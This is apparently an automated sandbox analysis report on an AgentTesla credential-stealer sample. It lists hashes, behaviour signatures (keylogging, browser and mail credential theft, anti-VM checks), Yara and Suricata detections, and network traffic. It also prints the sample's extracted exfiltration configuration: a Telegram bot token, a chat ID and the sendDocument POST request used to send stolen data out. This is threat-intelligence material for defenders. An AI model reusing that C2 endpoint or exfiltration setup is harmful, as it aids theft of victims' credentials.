Edit tour

Windows Analysis Report
LisectAVT_2403002A_127.exe

Overview

General Information

Sample name:	LisectAVT_2403002A_127.exe
Analysis ID:	1482510
MD5:	67cf14e98914a0ae61cda009d3ed1df7
SHA1:	4bf4a1f9365eb649a2fdf1a30b2e4c149fad03dc
SHA256:	79d0926744b84fc30f2a528b4aa64b2aa015001616f7062f15695fa00de45081
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

.NET source code contains potential unpacker

AI detected suspicious sample

Contains functionality to log keystrokes (.Net Source)

Installs a global keyboard hook

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

LisectAVT_2403002A_127.exe (PID: 5396 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe" MD5: 67CF14E98914A0AE61CDA009D3ED1DF7)

LisectAVT_2403002A_127.exe (PID: 5020 cmdline: "C:\Users\user\Desktop\LisectAVT_2403002A_127.exe" MD5: 67CF14E98914A0AE61CDA009D3ED1DF7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendMessage?chat_id=1394550246"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5396	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: LisectAVT_2403002A_127.exe PID: 5020	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3152c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3159e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31628:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x316ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31724:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31796:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3182c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x318bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3152c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3159e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31628:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x316ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31724:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31796:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3182c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x318bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
3.2.LisectAVT_2403002A_127.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.LisectAVT_2403002A_127.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.LisectAVT_2403002A_127.exe.400000.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.LisectAVT_2403002A_127.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3332c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3339e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33428:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x334ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33524:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33596:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3362c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x336bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.LisectAVT_2403002A_127.exe.42c7f38.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3332c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3339e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33428:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x334ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33524:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33596:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3362c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x336bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.LisectAVT_2403002A_127.exe.428d518.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x3332c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6dd4c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x3339e:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6ddbe:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33428:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6de48:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x334ba:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6deda:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x33524:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6df44:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x33596:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6dfb6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x3362c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e04c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x336bc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e0dc:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Click to see the 17 entries

Suricata Signatures

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:16.228907+0200
SID:	2852815
Source Port:	49745
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:20.476194+0200
SID:	2852815
Source Port:	49734
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:03:12.778554+0200
SID:	2852815
Source Port:	49755
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:03:04.473362+0200
SID:	2852815
Source Port:	49752
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:18.963992+0200
SID:	2852815
Source Port:	49733
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:49.873314+0200
SID:	2852815
Source Port:	49750
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:03:17.387586+0200
SID:	2852815
Source Port:	49757
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:30.614435+0200
SID:	2852815
Source Port:	49747
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:00:57.740029+0200
SID:	2852815
Source Port:	49730
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:00:52.810767+0200
SID:	2852815
Source Port:	49728
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:08.271354+0200
SID:	2852815
Source Port:	49742
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:35.574667+0200
SID:	2852815
Source Port:	49736
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:42.459543+0200
SID:	2852815
Source Port:	49738
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.6

Timestamp:	2024-07-25T23:59:27.125307+0200
SID:	2022930
Source Port:	443
Destination Port:	49719
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:21.632702+0200
SID:	2852815
Source Port:	49746
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:59.571959+0200
SID:	2852815
Source Port:	49751
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:09.266140+0200
SID:	2852815
Source Port:	49743
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:00:59.090939+0200
SID:	2852815
Source Port:	49731
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:40.324857+0200
SID:	2852815
Source Port:	49737
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:00.361986+0200
SID:	2852815
Source Port:	49741
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:22.620409+0200
SID:	2852815
Source Port:	49735
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:03:05.972685+0200
SID:	2852815
Source Port:	49753
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-25T23:59:19.197358+0200
SID:	2852815
Source Port:	49717
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow - Source IP: 20.12.23.50 - Destination IP: 192.168.2.6

Timestamp:	2024-07-26T00:00:04.546790+0200
SID:	2022930
Source Port:	443
Destination Port:	49725
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:48.498588+0200
SID:	2852815
Source Port:	49740
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:01:11.484324+0200
SID:	2852815
Source Port:	49732
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:41.578349+0200
SID:	2852815
Source Port:	49748
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:03:08.262544+0200
SID:	2852815
Source Port:	49754
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE Agent Tesla Telegram Exfil M2 - Source IP: 192.168.2.6 - Destination IP: 149.154.167.220

Timestamp:	2024-07-26T00:02:12.072219+0200
SID:	2852815
Source Port:	49744
Destination Port:	443
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

HTTP traffic detected: POST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dcacd37f51b3f3Host: api.telegram.orgContent-Length: 975Expect: 100-continueConnection: Keep-Alive

Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.000000000428D000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000000.00000002.2194739001.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000030E1000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4572559454.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/
Source: LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000325A000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000034B3000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000036B6000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003668000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.00000000031EE000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000334B000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003186000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.000000000341E000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003309000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003131000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_127.exe, 00000003.00000002.4574383032.0000000003351000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument
Source: LisectAVT_2403002A_127.exe	String found in binary or memory: https://download.alegsoftware.ga/ws_switches/contatore/ltromatic.ttf
Source: LisectAVT_2403002A_127.exe	String found in binary or memory: https://fsf.org/
Source: LisectAVT_2403002A_127.exe	String found in binary or memory: https://www.gnu.org/licenses/
Source: LisectAVT_2403002A_127.exe	String found in binary or memory: https://www.gnu.org/licenses/why-not-lgpl.html

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
